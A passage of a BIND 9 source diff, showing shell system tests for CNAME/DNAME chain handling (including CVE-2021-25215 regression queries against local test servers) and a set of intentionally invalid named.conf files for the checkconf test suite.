sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 loop.example > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 17" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME to external delegated zones is handled ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 a.example > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME to internal delegated zones is handled ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 b.example > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME to signed external delegation is handled ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 c.example > dig.out.$n +grep "status: NOERROR" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME to signed internal delegation is handled ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 d.example > dig.out.$n +grep "status: NOERROR" dig.out.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME chains in various orders ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n - step 1 --- 2>&1 | sed 's/^/ns7 /' | cat_i +echo "cname,cname,cname|1,2,3,4,s1,s2,s3,s4" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1 +grep 'status: NOERROR' dig.out.1.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.1.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 2 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "cname,cname,cname|1,1,2,2,3,4,s4,s3,s1" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.2.$n 2>&1 +grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.2.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 3 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "cname,cname,cname|2,1,3,4,s3,s1,s2,s4" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.3.$n 2>&1 +grep 'status: NOERROR' dig.out.3.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.3.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 4 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "cname,cname,cname|4,3,2,1,s4,s3,s2,s1" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.4.$n 2>&1 +grep 'status: NOERROR' dig.out.4.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.4.$n > /dev/null 2>&1 || ret=1 +echo "cname,cname,cname|4,3,2,1,s4,s3,s2,s1" | $SEND +$RNDCCMD 10.53.0.7 null --- start test$n - step 5 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.5.$n 2>&1 +grep 'status: NOERROR' dig.out.5.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.5.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 6 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "cname,cname,cname|4,3,3,3,s1,s1,1,3,4" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.6.$n 2>&1 +grep 'status: NOERROR' dig.out.6.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.6.$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that only the initial CNAME is cached ($n)" +ret=0 +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "cname,cname,cname|1,2,3,4,s1,s2,s3,s4" | $SEND +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1 +sleep 1 +$DIG $DIGOPTS +noall +answer @10.53.0.7 cname1.domain.nil > dig.out.2.$n 2>&1 +ttl=`awk '{print $2}' dig.out.2.$n` +[ "$ttl" -eq 86400 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking DNAME chains in various orders ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n - step 1 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "dname,dname|5,4,3,2,1,s5,s4,s3,s2,s1" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1 +grep 'status: NOERROR' dig.out.1.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 3' dig.out.1.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 2 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "dname,dname|5,4,3,2,1,s5,s4,s3,s2,s1" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.2.$n 2>&1 +grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 3' dig.out.2.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 3 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "dname,dname|2,3,s1,s2,s3,s4,1" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.3.$n 2>&1 +grep 'status: NOERROR' dig.out.3.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 3' dig.out.3.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking external CNAME/DNAME chains in various orders ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n - step 1 --- 2>&1 | sed 's/^/ns7 /' | cat_i +echo "xname,dname|1,2,3,4,s1,s2,s3,s4" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1 +grep 'status: NOERROR' dig.out.1.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.1.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 2 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "xname,dname|s2,2,s1,1,4,s4,3" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.2.$n 2>&1 +grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1 +grep 'ANSWER: 2' dig.out.2.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 null --- start test$n - step 3 --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +echo "xname,dname|s2,2,2,2" | $SEND +$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.3.$n 2>&1 +grep 'status: SERVFAIL' dig.out.3.$n > /dev/null 2>&1 || ret=1 +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking explicit DNAME query ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 dname short-dname.example > dig.out.7.$n 2>&1 +grep 'status: NOERROR' dig.out.7.$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking DNAME via ANY query ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 any short-dname.example > dig.out.7.$n 2>&1 +grep 'status: NOERROR' dig.out.7.$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Regression test for CVE-2021-25215 (authoritative server). +n=`expr $n + 1` +echo_i "checking DNAME resolution via itself (authoritative) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 DNAME self.domain0.self.domain0.nil. > dig.out.2.$n 2>&1 +grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Regression test for CVE-2021-25215 (recursive resolver). +n=`expr $n + 1` +echo_i "checking DNAME resolution via itself (recursive) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.7 DNAME self.example.self.example.dname. > dig.out.7.$n 2>&1 +grep 'status: NOERROR' dig.out.7.$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/checkconf/altdb.conf b/bin/tests/system/checkconf/altdb.conf new file mode 100644 index 0000000..e40118c --- /dev/null +++ b/bin/tests/system/checkconf/altdb.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view override_bind chaos { + zone "version.bind" chaos { + type master; + database "_builtin version"; + }; +}; diff --git a/bin/tests/system/checkconf/altdlz.conf b/bin/tests/system/checkconf/altdlz.conf new file mode 100644 index 0000000..18539da --- /dev/null +++ b/bin/tests/system/checkconf/altdlz.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dlz external { + database "dlopen driver.so"; + search no; +}; + +zone "example.com" { + type master; + dlz external; +}; + +zone "." { + type redirect; + dlz external; +}; diff --git a/bin/tests/system/checkconf/ancient.conf b/bin/tests/system/checkconf/ancient.conf new file mode 100644 index 0000000..98189cc --- /dev/null +++ b/bin/tests/system/checkconf/ancient.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Ancient options are fatal. + */ +options { + fake-iquery yes; +}; diff --git a/bin/tests/system/checkconf/bad-acl.conf b/bin/tests/system/checkconf/bad-acl.conf new file mode 100644 index 0000000..5095059 --- /dev/null +++ b/bin/tests/system/checkconf/bad-acl.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl a { + { "none"; }; + { !19.0.0.0/7; }; +}; + +options { + allow-query { a; }; +}; diff --git a/bin/tests/system/checkconf/bad-also-notify.conf b/bin/tests/system/checkconf/bad-also-notify.conf new file mode 100644 index 0000000..d93ff2d --- /dev/null +++ b/bin/tests/system/checkconf/bad-also-notify.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Missing master in also-notify clause. + */ + +zone dummy { + type master; + file "xxxx"; + also-notify { xxxx; }; +}; diff --git a/bin/tests/system/checkconf/bad-catz-zone.conf b/bin/tests/system/checkconf/bad-catz-zone.conf new file mode 100644 index 0000000..6f0677a --- /dev/null +++ b/bin/tests/system/checkconf/bad-catz-zone.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + catalog-zones { + zone "nonexistent"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-checknames-primary-dup-2.conf b/bin/tests/system/checkconf/bad-checknames-primary-dup-2.conf new file mode 100644 index 0000000..24e6ef9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-checknames-primary-dup-2.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-names primary warn; + check-names primary fail; +}; diff --git a/bin/tests/system/checkconf/bad-checknames-primary-dup.conf b/bin/tests/system/checkconf/bad-checknames-primary-dup.conf new file mode 100644 index 0000000..e746e84 --- /dev/null +++ b/bin/tests/system/checkconf/bad-checknames-primary-dup.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-names master warn; + check-names primary fail; +}; diff --git a/bin/tests/system/checkconf/bad-checknames-secondary-dup.conf b/bin/tests/system/checkconf/bad-checknames-secondary-dup.conf new file mode 100644 index 0000000..ea83d7e --- /dev/null +++ b/bin/tests/system/checkconf/bad-checknames-secondary-dup.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + check-names slave ignore; + check-names secondary warn; +}; diff --git a/bin/tests/system/checkconf/bad-dnskey-validity.conf b/bin/tests/system/checkconf/bad-dnskey-validity.conf new file mode 100644 index 0000000..8c28ac5 --- /dev/null +++ b/bin/tests/system/checkconf/bad-dnskey-validity.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnskey-sig-validity 5000; /* maximum value 10 years, this is 14 */ +}; diff --git a/bin/tests/system/checkconf/bad-dnssec.conf b/bin/tests/system/checkconf/bad-dnssec.conf new file mode 100644 index 0000000..7f1d524 --- /dev/null +++ b/bin/tests/system/checkconf/bad-dnssec.conf @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone not-inline { + type slave; + masters { 127.0.0.1; }; + inline-signing no; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; + dnssec-loadkeys-interval 10; + +}; + +zone inline { + type slave; + masters { 127.0.0.1; }; + inline-signing yes; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; + dnssec-loadkeys-interval 10; +}; diff --git a/bin/tests/system/checkconf/bad-duplicate-key.conf b/bin/tests/system/checkconf/bad-duplicate-key.conf new file mode 100644 index 0000000..17f2237 --- /dev/null +++ b/bin/tests/system/checkconf/bad-duplicate-key.conf @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-validation yes; +}; + +trust-anchors { + example. initial-key 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl + 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG + tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY + kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ + fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS + WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI + NQyrszHhWUU="; +}; + +trust-anchors { + example. static-key 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod + y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ + YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX + 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw + E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/ + Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn + 6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/bad-duplicate-primaries-1.conf b/bin/tests/system/checkconf/bad-duplicate-primaries-1.conf new file mode 100644 index 0000000..3bbabde --- /dev/null +++ b/bin/tests/system/checkconf/bad-duplicate-primaries-1.conf @@ -0,0 +1,15 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +primaries duplicate { 1.2.3.4; }; +primaries duplicate { 4.3.2.1; }; diff --git a/bin/tests/system/checkconf/bad-duplicate-primaries-2.conf b/bin/tests/system/checkconf/bad-duplicate-primaries-2.conf new file mode 100644 index 0000000..1d1c6f0 --- /dev/null +++ b/bin/tests/system/checkconf/bad-duplicate-primaries-2.conf @@ -0,0 +1,15 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +masters duplicate { 1.2.3.4; }; +primaries duplicate { 4.3.2.1; }; diff --git a/bin/tests/system/checkconf/bad-duplicate-root-key.conf b/bin/tests/system/checkconf/bad-duplicate-root-key.conf new file mode 100644 index 0000000..1cbc7d4 --- /dev/null +++ b/bin/tests/system/checkconf/bad-duplicate-root-key.conf @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-validation yes; +}; + +trust-anchors { + . initial-key 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl + 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG + tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY + kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ + fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS + WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI + NQyrszHhWUU="; +}; + +trusted-keys { + . 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod + y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ + YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX + 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw + E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/ + Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn + 6zqCkwuMmrU="; +}; diff --git a/bin/tests/system/checkconf/bad-geoip-use-ecs.conf b/bin/tests/system/checkconf/bad-geoip-use-ecs.conf new file mode 100644 index 0000000..b22d008 --- /dev/null +++ b/bin/tests/system/checkconf/bad-geoip-use-ecs.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + geoip-use-ecs yes; +}; diff --git a/bin/tests/system/checkconf/bad-glue-cache-bogus.conf b/bin/tests/system/checkconf/bad-glue-cache-bogus.conf new file mode 100644 index 0000000..c264b26 --- /dev/null +++ b/bin/tests/system/checkconf/bad-glue-cache-bogus.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + glue-cache bogusvalue; +}; diff --git a/bin/tests/system/checkconf/bad-hint.conf b/bin/tests/system/checkconf/bad-hint.conf new file mode 100644 index 0000000..7214a00 --- /dev/null +++ b/bin/tests/system/checkconf/bad-hint.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type hint; + masterfile-format raw; + file "hint"; +}; diff --git a/bin/tests/system/checkconf/bad-in-view-dup.conf b/bin/tests/system/checkconf/bad-in-view-dup.conf new file mode 100644 index 0000000..5c6329c --- /dev/null +++ b/bin/tests/system/checkconf/bad-in-view-dup.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view a { + zone x { type master; file "x"; }; +}; + +view b { + zone x { type master; file "x"; }; + zone x { in-view a; }; +}; diff --git a/bin/tests/system/checkconf/bad-inline-options.conf b/bin/tests/system/checkconf/bad-inline-options.conf new file mode 100644 index 0000000..f7c62dd --- /dev/null +++ b/bin/tests/system/checkconf/bad-inline-options.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * inline-signing not allowed at options level. + */ +options { + inline-signing yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/checkconf/bad-inline-slave.conf b/bin/tests/system/checkconf/bad-inline-slave.conf new file mode 100644 index 0000000..10e9649 --- /dev/null +++ b/bin/tests/system/checkconf/bad-inline-slave.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + + /* + * An inline-signing slave should be forced to have a file option + */ + + zone "." { + type slave; + inline-signing yes; + masters { 10.53.0.1; }; + };
